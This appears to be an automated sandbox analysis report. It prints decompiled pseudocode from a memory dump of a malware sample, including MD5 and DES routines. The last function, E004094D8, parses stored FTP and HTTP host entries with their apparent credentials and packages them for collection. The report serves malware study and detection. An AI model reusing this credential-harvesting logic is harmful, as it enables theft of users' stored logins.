					_t217 = ((_t312 ^ _t361) & _t263 ^ _t361) + _t214 + 0x698098d8 +  *((intOrPtr*)(_t645 + 0x20)) + _t263;
					asm("rol edx, 0xc");
					_t364 = ((_t263 ^ _t312) & _t217 ^ _t312) + _t361 - 0x74bb0851 +  *((intOrPtr*)(_t645 + 0x24)) + _t217;
					asm("rol ecx, 0x11");
					_t315 = ((_t217 ^ _t263) & _t364 ^ _t263) + _t312 - 0xa44f +  *((intOrPtr*)(_t645 + 0x28)) + _t364;
					asm("rol ebx, 0x16");
					_t266 = ((_t364 ^ _t217) & _t315 ^ _t217) + _t263 - 0x76a32842 +  *((intOrPtr*)(_t645 + 0x2c)) + _t315;
					asm("rol eax, 0x7");
					_t220 = ((_t315 ^ _t364) & _t266 ^ _t364) + _t217 + 0x6b901122 +  *((intOrPtr*)(_t645 + 0x30)) + _t266;
					asm("rol edx, 0xc");
					_t367 = ((_t266 ^ _t315) & _t220 ^ _t315) + _t364 - 0x2678e6d +  *((intOrPtr*)(_t645 + 0x34)) + _t220;
					asm("rol ecx, 0x11");
					_t318 = ((_t220 ^ _t266) & _t367 ^ _t266) + _t315 - 0x5986bc72 +  *((intOrPtr*)(_t645 + 0x38)) + _t367;
					asm("rol ebx, 0x16");
					_t269 = ((_t367 ^ _t220) & _t318 ^ _t220) + _t266 + 0x49b40821 +  *((intOrPtr*)(_t645 + 0x3c)) + _t318;
					asm("rol eax, 0x5");
					_t223 = ((_t318 ^ _t269) & _t367 ^ _t318) + _t220 - 0x9e1da9e +  *((intOrPtr*)(_t645 + 4)) + _t269;
					asm("rol edx, 0x9");
					_t370 = ((_t269 ^ _t223) & _t318 ^ _t269) + _t367 - 0x3fbf4cc0 +  *((intOrPtr*)(_t645 + 0x18)) + _t223;
					asm("rol ecx, 0xe");
					_t321 = ((_t223 ^ _t370) & _t269 ^ _t223) + _t318 + 0x265e5a51 +  *((intOrPtr*)(_t645 + 0x2c)) + _t370;
					asm("rol ebx, 0x14");
					_t272 = ((_t370 ^ _t321) & _t223 ^ _t370) + _t269 - 0x16493856 +  *_t645 + _t321;
					asm("rol eax, 0x5");
					_t226 = ((_t321 ^ _t272) & _t370 ^ _t321) + _t223 - 0x29d0efa3 +  *((intOrPtr*)(_t645 + 0x14)) + _t272;
					asm("rol edx, 0x9");
					_t373 = ((_t272 ^ _t226) & _t321 ^ _t272) + _t370 + 0x2441453 +  *((intOrPtr*)(_t645 + 0x28)) + _t226;
					asm("rol ecx, 0xe");
					_t324 = ((_t226 ^ _t373) & _t272 ^ _t226) + _t321 - 0x275e197f +  *((intOrPtr*)(_t645 + 0x3c)) + _t373;
					asm("rol ebx, 0x14");
					_t275 = ((_t373 ^ _t324) & _t226 ^ _t373) + _t272 - 0x182c0438 +  *((intOrPtr*)(_t645 + 0x10)) + _t324;
					asm("rol eax, 0x5");
					_t229 = ((_t324 ^ _t275) & _t373 ^ _t324) + _t226 + 0x21e1cde6 +  *((intOrPtr*)(_t645 + 0x24)) + _t275;
					asm("rol edx, 0x9");
					_t376 = ((_t275 ^ _t229) & _t324 ^ _t275) + _t373 - 0x3cc8f82a +  *((intOrPtr*)(_t645 + 0x38)) + _t229;
					asm("rol ecx, 0xe");
					_t327 = ((_t229 ^ _t376) & _t275 ^ _t229) + _t324 - 0xb2af279 +  *((intOrPtr*)(_t645 + 0xc)) + _t376;
					asm("rol ebx, 0x14");
					_t278 = ((_t376 ^ _t327) & _t229 ^ _t376) + _t275 + 0x455a14ed +  *((intOrPtr*)(_t645 + 0x20)) + _t327;
					asm("rol eax, 0x5");
					_t232 = ((_t327 ^ _t278) & _t376 ^ _t327) + _t229 - 0x561c16fb +  *((intOrPtr*)(_t645 + 0x34)) + _t278;
					asm("rol edx, 0x9");
					_t379 = ((_t278 ^ _t232) & _t327 ^ _t278) + _t376 - 0x3105c08 +  *((intOrPtr*)(_t645 + 8)) + _t232;
					asm("rol ecx, 0xe");
					_t330 = ((_t232 ^ _t379) & _t278 ^ _t232) + _t327 + 0x676f02d9 +  *((intOrPtr*)(_t645 + 0x1c)) + _t379;
					asm("rol ebx, 0x14");
					_t281 = ((_t379 ^ _t330) & _t232 ^ _t379) + _t278 - 0x72d5b376 +  *((intOrPtr*)(_t645 + 0x30)) + _t330;
					asm("rol eax, 0x4");
					_t235 = (_t330 ^ _t379 ^ _t281) + _t232 - 0x5c6be +  *((intOrPtr*)(_t645 + 0x14)) + _t281;
					asm("rol edx, 0xb");
					_t382 = (_t281 ^ _t330 ^ _t235) + _t379 - 0x788e097f +  *((intOrPtr*)(_t645 + 0x20)) + _t235;
					asm("rol ecx, 0x10");
					_t333 = (_t235 ^ _t281 ^ _t382) + _t330 + 0x6d9d6122 +  *((intOrPtr*)(_t645 + 0x2c)) + _t382;
					asm("rol ebx, 0x17");
					_t284 = (_t382 ^ _t235 ^ _t333) + _t281 - 0x21ac7f4 +  *((intOrPtr*)(_t645 + 0x38)) + _t333;
					asm("rol eax, 0x4");
					_t238 = (_t333 ^ _t382 ^ _t284) + _t235 - 0x5b4115bc +  *((intOrPtr*)(_t645 + 4)) + _t284;
					asm("rol edx, 0xb");
					_t385 = (_t284 ^ _t333 ^ _t238) + _t382 + 0x4bdecfa9 +  *((intOrPtr*)(_t645 + 0x10)) + _t238;
					asm("rol ecx, 0x10");
					_t336 = (_t238 ^ _t284 ^ _t385) + _t333 - 0x944b4a0 +  *((intOrPtr*)(_t645 + 0x1c)) + _t385;
					asm("rol ebx, 0x17");
					_t287 = (_t385 ^ _t238 ^ _t336) + _t284 - 0x41404390 +  *((intOrPtr*)(_t645 + 0x28)) + _t336;
					asm("rol eax, 0x4");
					_t241 = (_t336 ^ _t385 ^ _t287) + _t238 + 0x289b7ec6 +  *((intOrPtr*)(_t645 + 0x34)) + _t287;
					asm("rol edx, 0xb");
					_t388 = (_t287 ^ _t336 ^ _t241) + _t385 - 0x155ed806 +  *_t645 + _t241;
					asm("rol ecx, 0x10");
					_t339 = (_t241 ^ _t287 ^ _t388) + _t336 - 0x2b10cf7b +  *((intOrPtr*)(_t645 + 0xc)) + _t388;
					asm("rol ebx, 0x17");
					_t290 = (_t388 ^ _t241 ^ _t339) + _t287 + 0x4881d05 +  *((intOrPtr*)(_t645 + 0x18)) + _t339;
					asm("rol eax, 0x4");
					_t244 = (_t339 ^ _t388 ^ _t290) + _t241 - 0x262b2fc7 +  *((intOrPtr*)(_t645 + 0x24)) + _t290;
					asm("rol edx, 0xb");
					_t391 = (_t290 ^ _t339 ^ _t244) + _t388 - 0x1924661b +  *((intOrPtr*)(_t645 + 0x30)) + _t244;
					asm("rol ecx, 0x10");
					_t342 = (_t244 ^ _t290 ^ _t391) + _t339 + 0x1fa27cf8 +  *((intOrPtr*)(_t645 + 0x3c)) + _t391;
					asm("rol ebx, 0x17");
					_t293 = (_t391 ^ _t244 ^ _t342) + _t290 - 0x3b53a99b +  *((intOrPtr*)(_t645 + 8)) + _t342;
					_t150 = _t244 - 0xbd6ddbc; // 0xf4292243
					asm("rol eax, 0x6");
					_t247 = ((0xffffffff ^ _t391 | _t293) ^ _t342) + _t150 +  *_t645 + _t293;
					_t152 = _t391 + 0x432aff97; // 0x1432aff96
					asm("rol edx, 0xa");
					_t394 = ((0xffffffff ^ _t342 | _t247) ^ _t293) + _t152 +  *((intOrPtr*)(_t645 + 0x1c)) + _t247;
					_t155 = _t342 - 0x546bdc59; // 0xab9423a6
					asm("rol ecx, 0xf");
					_t345 = ((0xffffffff ^ _t293 | _t394) ^ _t247) + _t155 +  *((intOrPtr*)(_t645 + 0x38)) + _t394;
					_t158 = _t293 - 0x36c5fc7; // 0xfc93a038
					asm("rol ebx, 0x15");
					_t296 = ((0xffffffff ^ _t247 | _t345) ^ _t394) + _t158 +  *((intOrPtr*)(_t645 + 0x14)) + _t345;
					_t161 = _t247 + 0x655b59c3; // 0x1655b59c2
					asm("rol eax, 0x6");
					_t250 = ((0xffffffff ^ _t394 | _t296) ^ _t345) + _t161 +  *((intOrPtr*)(_t645 + 0x30)) + _t296;
					_t164 = _t394 - 0x70f3336e; // 0x8f0ccc91
					asm("rol edx, 0xa");
					_t397 = ((0xffffffff ^ _t345 | _t250) ^ _t296) + _t164 +  *((intOrPtr*)(_t645 + 0xc)) + _t250;
					_t167 = _t345 - 0x100b83; // 0xffeff47c
					asm("rol ecx, 0xf");
					_t348 = ((0xffffffff ^ _t296 | _t397) ^ _t250) + _t167 +  *((intOrPtr*)(_t645 + 0x28)) + _t397;
					_t170 = _t296 - 0x7a7ba22f; // 0x85845dd0
					asm("rol ebx, 0x15");
					_t299 = ((0xffffffff ^ _t250 | _t348) ^ _t397) + _t170 +  *((intOrPtr*)(_t645 + 4)) + _t348;
					_t173 = _t250 + 0x6fa87e4f; // 0x16fa87e4e
					asm("rol eax, 0x6");
					_t253 = ((0xffffffff ^ _t397 | _t299) ^ _t348) + _t173 +  *((intOrPtr*)(_t645 + 0x20)) + _t299;
					_t176 = _t397 - 0x1d31920; // 0xfe2ce6df
					asm("rol edx, 0xa");
					_t400 = ((0xffffffff ^ _t348 | _t253) ^ _t299) + _t176 +  *((intOrPtr*)(_t645 + 0x3c)) + _t253;
					_t179 = _t348 - 0x5cfebcec; // 0xa3014313
					asm("rol ecx, 0xf");
					_t351 = ((0xffffffff ^ _t299 | _t400) ^ _t253) + _t179 +  *((intOrPtr*)(_t645 + 0x18)) + _t400;
					_t182 = _t299 + 0x4e0811a1; // 0x14e0811a0
					asm("rol ebx, 0x15");
					_t302 = ((0xffffffff ^ _t253 | _t351) ^ _t400) + _t182 +  *((intOrPtr*)(_t645 + 0x34)) + _t351;
					_t185 = _t253 - 0x8ac817e; // 0xf7537e81
					asm("rol eax, 0x6");
					_t256 = ((0xffffffff ^ _t400 | _t302) ^ _t351) + _t185 +  *((intOrPtr*)(_t645 + 0x10)) + _t302;
					_t188 = _t400 - 0x42c50dcb; // 0xbd3af234
					asm("rol edx, 0xa");
					_t403 = ((0xffffffff ^ _t351 | _t256) ^ _t302) + _t188 +  *((intOrPtr*)(_t645 + 0x2c)) + _t256;
					_t191 = _t351 + 0x2ad7d2bb; // 0x12ad7d2ba
					asm("rol ecx, 0xf");
					_t354 = ((0xffffffff ^ _t302 | _t403) ^ _t256) + _t191 +  *((intOrPtr*)(_t645 + 8)) + _t403;
					_t194 = _t302 - 0x14792c6f; // 0xeb86d390
					asm("rol ebx, 0x15");
					_t404 = _a4;
					 *_t404 =  *_t404 + _t256;
					 *(_t404 + 4) =  *(_t404 + 4) + ((0xffffffff ^ _t256 | _t354) ^ _t403) + _t194 +  *((intOrPtr*)(_t645 + 0x24)) + _t354;
					 *(_t404 + 8) =  *(_t404 + 8) + _t354;
					 *(_t404 + 0xc) =  *(_t404 + 0xc) + _t403;
					_t203 =  &_v8;
					 *_t203 = _v8 - 1;
					_t645 = _t645 + 0x40;
				} while ( *_t203 >= 0);
				return _t256;
			}

0x00402f09
0x00402f0c
0x00402f12
0x00402f15
0x00402f17
0x00402f1a
0x00402f1d
0x00402f31
0x00402f34
0x00402f48
0x00402f4b
0x00402f5f
0x00402f62
0x00402f76
0x00402f79
0x00402f8d
0x00402f90
0x00402fa4
0x00402fa7
0x00402fbb
0x00402fbe
0x00402fd2
0x00402fd5
0x00402fe9
0x00402fec
0x00403000
0x00403003
0x00403017
0x0040301a
0x0040302e
0x00403031
0x00403045
0x00403048
0x0040305c
0x0040305f
0x00403073
0x00403076
0x0040308a
0x0040308d
0x004030a1
0x004030a4
0x004030b8
0x004030bb
0x004030cf
0x004030d2
0x004030e5
0x004030e8
0x004030fc
0x004030ff
0x00403113
0x00403116
0x0040312a
0x0040312d
0x00403141
0x00403144
0x00403158
0x0040315b
0x0040316f
0x00403172
0x00403186
0x00403189
0x0040319d
0x004031a0
0x004031b4
0x004031b7
0x004031cb
0x004031ce
0x004031e2
0x004031e5
0x004031f9
0x004031fc
0x0040320e
0x00403211
0x00403223
0x00403226
0x00403238
0x0040323b
0x0040324d
0x00403250
0x00403262
0x00403265
0x00403277
0x0040327a
0x0040328c
0x0040328f
0x004032a1
0x004032a4
0x004032b6
0x004032b9
0x004032ca
0x004032cd
0x004032df
0x004032e2
0x004032f4
0x004032f7
0x00403309
0x0040330c
0x0040331e
0x00403321
0x00403333
0x00403336
0x00403348
0x0040334b
0x00403358
0x00403361
0x00403364
0x00403371
0x0040337b
0x0040337e
0x0040338b
0x00403395
0x00403398
0x004033a5
0x004033af
0x004033b2
0x004033bf
0x004033c9
0x004033cc
0x004033d9
0x004033e3
0x004033e6
0x004033f3
0x004033fd
0x00403400
0x0040340d
0x00403417
0x0040341a
0x00403427
0x00403431
0x00403434
0x00403441
0x0040344b
0x0040344e
0x0040345b
0x00403465
0x00403468
0x00403475
0x0040347f
0x00403482
0x0040348f
0x00403499
0x0040349c
0x004034a9
0x004034b3
0x004034b6
0x004034c3
0x004034cd
0x004034d0
0x004034dd
0x004034e7
0x004034ec
0x004034ef
0x004034f1
0x004034f4
0x004034f7
0x004034fa
0x004034fa
0x004034fd
0x004034fd
0x0040350d

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
Instruction ID: 2545cf6bef447fb7225041bb1f3c9065af7e7a2ad6f25ff4df53b15ebc9ce0fc
Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
Instruction Fuzzy Hash: 05121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648

Uniqueness

Uniqueness Score: -1.00%

Function 004121E9, Relevance: .2, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004121E9(signed int* _a4, signed int* _a8) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int* _t40;
				signed int* _t41;
				signed int* _t42;
				signed int* _t43;
				signed int* _t69;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t99;
				signed int _t101;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				unsigned int _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t197;

				_t40 = _a8;
				_t119 =  *_a4;
				_t105 = _a4[1];
				_t73 = (_t119 >> 0x00000004 ^ _t105) & 0x0f0f0f0f;
				_t106 = _t105 ^ _t73;
				_t120 = _t119 ^ _t73 << 0x00000004;
				_t75 = (_t120 >> 0x00000010 ^ _t106) & 0x0000ffff;
				_t107 = _t106 ^ _t75;
				_t121 = _t120 ^ _t75 << 0x00000010;
				_t77 = (_t107 >> 0x00000002 ^ _t121) & 0x33333333;
				_t122 = _t121 ^ _t77;
				_t108 = _t107 ^ _t77 << 0x00000002;
				_t79 = (_t108 >> 0x00000008 ^ _t122) & 0x00ff00ff;
				_t123 = _t122 ^ _t79;
				_t197 = _t79 << 0x00000008 ^ _t108;
				_v8 = _t197;
				_t110 = _t197 + _t197 | _v8 >> 0x0000001f & 0x00000001;
				_t81 = (_t123 ^ _t110) & 0xaaaaaaaa;
				_t111 = _t110 ^ _t81;
				_t126 = (_t123 ^ _t81) + (_t123 ^ _t81) | (_t123 ^ _t81) >> 0x0000001f & 0x00000001;
				_v12 = 8;
				do {
					_t41 =  &(_t40[1]);
					_v16 =  *(0x417cf0 + (((_t111 << 0x0000001c | _t111 >> 0x00000004) ^  *_t40) & 0x0000003f) * 4) |  *((((_t111 << 0x0000001c | _t111 >> 0x00000004) ^  *_t40) >> 0x00000006 & 0x000000fc) + 0x417af0) |  *((((_t111 << 0x0000001c | _t111 >> 0x00000004) ^  *_t40) >> 0x0000000e & 0x000000fc) + 0x4178f0) |  *((((_t111 << 0x0000001c | _t111 >> 0x00000004) ^  *_t40) >> 0x00000016 & 0x000000fc) + 0x4176f0);
					_t42 =  &(_t41[1]);
					_t126 = _t126 ^ ( *(0x417df0 + ((_t111 ^  *_t41) & 0x0000003f) * 4) | _v16 |  *(((_t111 ^  *_t41) >> 0x00000006 & 0x000000fc) + 0x417bf0) |  *(((_t111 ^  *_t41) >> 0x0000000e & 0x000000fc) + 0x4179f0) |  *(((_t111 ^  *_t41) >> 0x00000016 & 0x000000fc) + 0x4177f0));
					_t43 =  &(_t42[1]);
					_v16 =  *(0x417cf0 + (((_t126 << 0x0000001c | _t126 >> 0x00000004) ^  *_t42) & 0x0000003f) * 4) |  *((((_t126 << 0x0000001c | _t126 >> 0x00000004) ^  *_t42) >> 0x00000006 & 0x000000fc) + 0x417af0) |  *((((_t126 << 0x0000001c | _t126 >> 0x00000004) ^  *_t42) >> 0x0000000e & 0x000000fc) + 0x4178f0) |  *((((_t126 << 0x0000001c | _t126 >> 0x00000004) ^  *_t42) >> 0x00000016 & 0x000000fc) + 0x4176f0);
					_t40 =  &(_t43[1]);
					_t111 = _t111 ^ ( *(0x417df0 + ((_t126 ^  *_t43) & 0x0000003f) * 4) | _v16 |  *(((_t126 ^  *_t43) >> 0x00000006 & 0x000000fc) + 0x417bf0) |  *(((_t126 ^  *_t43) >> 0x0000000e & 0x000000fc) + 0x4179f0) |  *(((_t126 ^  *_t43) >> 0x00000016 & 0x000000fc) + 0x4177f0));
					_v12 = _v12 - 1;
				} while (_v12 != 0);
				_t113 = _t111 << 0x0000001f | _t111 >> 0x00000001;
				_t93 = (_t126 ^ _t113) & 0xaaaaaaaa;
				_t114 = _t113 ^ _t93;
				_t129 = (_t126 ^ _t93) << 0x0000001f | (_t126 ^ _t93) >> 0x00000001;
				_t95 = (_t129 >> 0x00000008 ^ _t114) & 0x00ff00ff;
				_t115 = _t114 ^ _t95;
				_t130 = _t129 ^ _t95 << 0x00000008;
				_t97 = (_t130 >> 0x00000002 ^ _t115) & 0x33333333;
				_t116 = _t115 ^ _t97;
				_t131 = _t130 ^ _t97 << 0x00000002;
				_t99 = (_t116 >> 0x00000010 ^ _t131) & 0x0000ffff;
				_t132 = _t131 ^ _t99;
				_t117 = _t116 ^ _t99 << 0x00000010;
				_t101 = (_t117 >> 0x00000004 ^ _t132) & 0x0f0f0f0f;
				 *_a4 = _t101 << 0x00000004 ^ _t117;
				_a4 =  &(_a4[1]);
				_t69 = _a4;
				 *_t69 = _t132 ^ _t101;
				return _t69;
			}

0x004121f2
0x004121f8
0x004121fd
0x00412207
0x0041220d
0x00412214
0x0041221f
0x00412225
0x0041222c
0x00412237
0x0041223d
0x00412244
0x0041224f
0x00412255
0x0041225c
0x0041225e
0x0041226e
0x00412276
0x0041227e
0x0041228d
0x0041228f
0x00412296
0x004122a6
0x004122ea
0x004122ef
0x00412338
0x0041234a
0x0041238e
0x00412393
0x004123dc
0x004123de
0x004123e1
0x004123f6
0x004123fe
0x00412406
0x00412413
0x0041241e
0x00412424
0x0041242b
0x00412436
0x0041243c
0x00412443
0x0041244e
0x00412454
0x0041245b
0x00412466
0x00412476
0x00412478
0x0041247c
0x0041247f
0x00412487

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e81fb78ac354ee097640eab5717c4d3c17e347a3450a17031ab049b40a00ab
Instruction ID: a3ab7fe7015f67ee49eb8ee9fe6df9325a8b680d2dcb251794c37e3166a95e3c
Opcode Fuzzy Hash: 24e81fb78ac354ee097640eab5717c4d3c17e347a3450a17031ab049b40a00ab
Instruction Fuzzy Hash: 7B719237F506364BE7589DAA8881155F7A2ABC8320B5F827DCD19F7381C9B4BD12C6C4

Uniqueness

Uniqueness Score: -1.00%

Function 004094D8, Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004094D8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				int _v24;
				int _v28;
				int* _v32;
				int* _v36;
				int* _v40;
				int* _v44;
				int* _v48;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				char* _v68;
				int _v72;
				int _v76;
				int _v80;
				void* _t85;
				int _t87;
				int _t90;
				int _t94;
				int _t98;
				int _t102;
				int _t105;
				int _t109;
				int _t110;
				int _t111;
				int _t123;
				int _t125;
				void* _t127;
				int _t128;
				int* _t130;

				_t85 = E00401F36(_a8);
				if(_t85 != 0) {
					_t87 = E0040413F(_a8);
					__eflags = _t87;
					if(_t87 == 0) {
						E00409061(_t87, _a12, _a16);
						_t90 = E00401FFD(__eflags, _a8,  &_v20);
						__eflags = _t90;
						if(_t90 != 0) {
							_t94 = E004025E7(_v12, _v8);
							__eflags = _t94;
							if(_t94 != 0) {
								_v24 = _t94;
								_t130 = _t94;
								__eflags =  *_t130;
								if(__eflags != 0) {
									_t98 = E0040949C(__eflags, _t130);
									_v52 = _t98;
									_push(_v52);
									_push("#2c");
									L004106EE();
									_push(_t98);
									_push(_v52);
									_push("#2d");
									L004106EE();
									_push(_t98);
									_push(_v52);
									_push("#2e");
									L004106EE();
									_pop(_t128);
									_pop(_t125);
									__eflags = _t98;
									if(_t98 == 0) {
										L10:
										__eflags = _t125;
										if(_t125 != 0) {
											_v80 = 0;
										} else {
											_v80 = 1;
										}
										asm("cld");
										_t127 = 0xffffffff;
										asm("repne scasb");
										__eflags =  *_t130;
										if ( *_t130 != 0) goto L14;
										_v28 = 0;
										while(1) {
											__eflags =  *_t130;
											if(__eflags == 0) {
												goto L52;
											}
											_t102 = E0040949C(__eflags, _t130);
											_v56 = _t102;
											__eflags = _v28;
											if(_v28 != 0) {
												__eflags = _v28 - 1;
												if(_v28 != 1) {
													__eflags = _v28 - 2;
													if(_v28 != 2) {
														__eflags = _v28 - 3;
														if(_v28 != 3) {
															__eflags = _v28 - 4;
															if(_v28 != 4) {
																__eflags = _v28 - 5;
																if(_v28 != 5) {
																	__eflags = _v28 - 6;
																	if(_v28 == 6) {
																		_v28 = 2;
																	}
																} else {
																	_v48 = _t130;
																	__eflags = _v80;
																	if(__eflags == 0) {
																		_v28 = 6;
																	} else {
																		_v28 = 2;
																	}
																	_v68 = 0;
																	_v60 = 0;
																	_v64 = 0;
																	_v72 = 0;
																	_v76 = 0;
																	_v68 = E0040949C(__eflags, _v32);
																	_v60 = E0040949C(__eflags, _v40);
																	_t109 = E0040949C(__eflags, _v48);
																	_v64 = _t109;
																	__eflags =  *0x416030;
																	if( *0x416030 != 0) {
																		__eflags =  *0x416030 - 1;
																		if( *0x416030 != 1) {
																			_t110 = 0;
																			__eflags = 0;
																		} else {
																			_push("ftp.");
																			L0041066A();
																			_t110 = StrCmpNIA(_v68, "ftp.", _t109);
																		}
																	} else {
																		_push("ftp://");
																		L0041066A();
																		_t123 = StrCmpNIA(_v68, "ftp://", _t109);
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_push("http://");
																			L0041066A();
																			_t123 = StrCmpNIA(_v68, "http://", _t123);
																		}
																		_t110 = _t123;
																		__eflags = _t110;
																		if(_t110 != 0) {
																			_push("https://");
																			L0041066A();
																			_t110 = StrCmpNIA(_v68, "https://", _t110);
																		}
																	}
																	_t111 = _t110;
																	__eflags = _t111;
																	if(_t111 == 0) {
																		_push(_v60);
																		L0041066A();
																		_v72 = E00409142(_t127, _v60, _t111);
																		_push(_v64);
																		L0041066A();
																		_v76 = E00409142(_t127, _v64, _t116);
																		__eflags = _v68;
																		if(_v68 != 0) {
																			__eflags = _v76;
																			if(_v76 != 0) {
																				E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v68), _a4, _v72), _a4, _v76);
																			}
																		}
																	}
																	E004018B8(_v68);
																	E004018B8(_v60);
																	E004018B8(_v64);
																	E004018B8(_v72);
																	_t102 = E004018B8(_v76);
																}
															} else {
																_v44 = _t130;
																_v28 = 5;
															}
														} else {
															_v40 = _t130;
															_v28 = 4;
														}
													} else {
														_v36 = _t130;
														_v28 = 3;
													}
												} else {
													_v32 = _t130;
													_v28 = 2;
												}
												__eflags = _v28;
												if(_v28 != 0) {
													_push(0x414f84);
													_push(_v56);
													L004106EE();
													_t105 = _t102;
													__eflags = _t105;
													if(_t105 == 0) {
														_v28 = 1;
													}
													_push("---");
													_push(_v56);
													L004106EE();
													__eflags = _t105;
													if(_t105 == 0) {
														_v28 = 2;
													}
												}
											} else {
												_push(0x414f84);
												_push(_v56);
												L004106EE();
												__eflags = _t102;
												if(_t102 == 0) {
													_v28 = 1;
												}
											}
											E004018B8(_v56);
											asm("cld");
											_t127 = 0xffffffff;
											asm("repne scasb");
											__eflags =  *_t130;
											if( *_t130 != 0) {
												continue;
											}
											goto L52;
										}
									} else {
										__eflags = _t128;
										if(_t128 == 0) {
											goto L10;
										} else {
											_t125 = _t125;
											__eflags = _t125;
											if(_t125 == 0) {
												goto L10;
											}
										}
									}
									L52:
									E004018B8(_v52);
								}
								E004018B8(_v24);
							}
							E00402091( &_v20);
						}
						return E00409119();
					} else {
						return _t87;
					}
				} else {
					return _t85;
				}
			}

0x004094e7
0x004094e9
0x004094f8
0x004094f8
0x004094fa
0x00409507
0x00409513
0x00409518
0x0040951a
0x0040952b
0x0040952b
0x0040952d
0x00409533
0x00409536
0x00409538
0x0040953b
0x00409542
0x00409547
0x0040954a
0x0040954d
0x00409552
0x00409557
0x00409558
0x0040955b
0x00409560
0x00409565
0x00409566
0x00409569
0x0040956e
0x00409573
0x00409574
0x00409575
0x00409577
0x00409585
0x00409585
0x00409587
0x00409592
0x00409589
0x00409589
0x00409589
0x00409599
0x0040959c
0x004095a1
0x004095a3
0x004095a5
0x004095a7
0x004095ae
0x004095ae
0x004095b1
0x00000000
0x00000000
0x004095b8
0x004095bd
0x004095c0
0x004095c4
0x004095e7
0x004095eb
0x004095fc
0x00409600
0x00409611
0x00409615
0x00409626
0x0040962a
0x0040963b
0x0040963f
0x004097b2
0x004097b6
0x004097b8
0x004097b8
0x00409645
0x00409645
0x00409648
0x0040964c
0x00409657
0x0040964e
0x0040964e
0x0040964e
0x0040965e
0x00409665
0x0040966c
0x00409673
0x0040967a
0x00409689
0x00409694
0x0040969a
0x0040969f
0x004096a2
0x004096a9
0x004096fd
0x00409704
0x00409720
0x00409720
0x00409706
0x00409706
0x0040970b
0x00409719
0x00409719
0x004096ab
0x004096ab
0x004096b0
0x004096c3
0x004096c3
0x004096c5
0x004096c7
0x004096cc
0x004096da
0x004096da
0x004096df
0x004096df
0x004096e1
0x004096e3
0x004096e8
0x004096f6
0x004096f6
0x004096e1
0x00409722
0x00409722
0x00409724
0x00409726
0x00409729
0x00409737
0x0040973a
0x0040973d
0x0040974b
0x0040974e
0x00409752
0x00409754
0x00409758
0x00409783
0x00409783
0x00409758
0x00409752
0x0040978b
0x00409793
0x0040979b
0x004097a3
0x004097ab
0x004097ab
0x0040962c
0x0040962c
0x0040962f
0x0040962f
0x00409617
0x00409617
0x0040961a
0x0040961a
0x00409602
0x00409602
0x00409605
0x00409605
0x004095ed
0x004095ed
0x004095f0
0x004095f0
0x004097bf
0x004097c3
0x004097c5
0x004097ca
0x004097cd
0x004097d2
0x004097d2
0x004097d4
0x004097d6
0x004097d6
0x004097dd
0x004097e2
0x004097e5
0x004097ea
0x004097ec
0x004097ee
0x004097ee
0x004097ec
0x004095c6
0x004095c6
0x004095cb
0x004095ce
0x004095d3
0x004095d5
0x004095db
0x004095db
0x004095d5
0x004097f8
0x004097fd
0x00409800
0x00409805
0x00409807
0x00409809
0x00000000
0x00000000
0x00000000
0x00409809
0x00409579
0x00409579
0x0040957b
0x00000000
0x0040957d
0x0040957d
0x0040957d
0x0040957f
0x00000000
0x00000000
0x0040957f
0x0040957b
0x0040980f
0x00409812
0x00409812
0x0040981a
0x0040981a
0x00409823
0x00409823
0x0040982f
0x004094fe
0x004094fe
0x004094fe
0x004094ed
0x004094ed
0x004094ed

Strings

#2e, xrefs: 00409569
https://, xrefs: 004096E3, 004096EE
ftp., xrefs: 00409706, 00409711
ftp://, xrefs: 004096AB, 004096B6
#2d, xrefs: 0040955B
http://, xrefs: 004096C7, 004096D2
#2c, xrefs: 0040954D
---, xrefs: 004097DD

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
API String ID: 0-1526611526
Opcode ID: 5cb0668236f4ab21225d3fc1a8a4d9074842248b6d3c0c65b2de98502e910106
Instruction ID: 8ada1e9ecac2b6a16ee08af0ca764310d7711adbc3e5f5be3c6fd46ad6a69e20
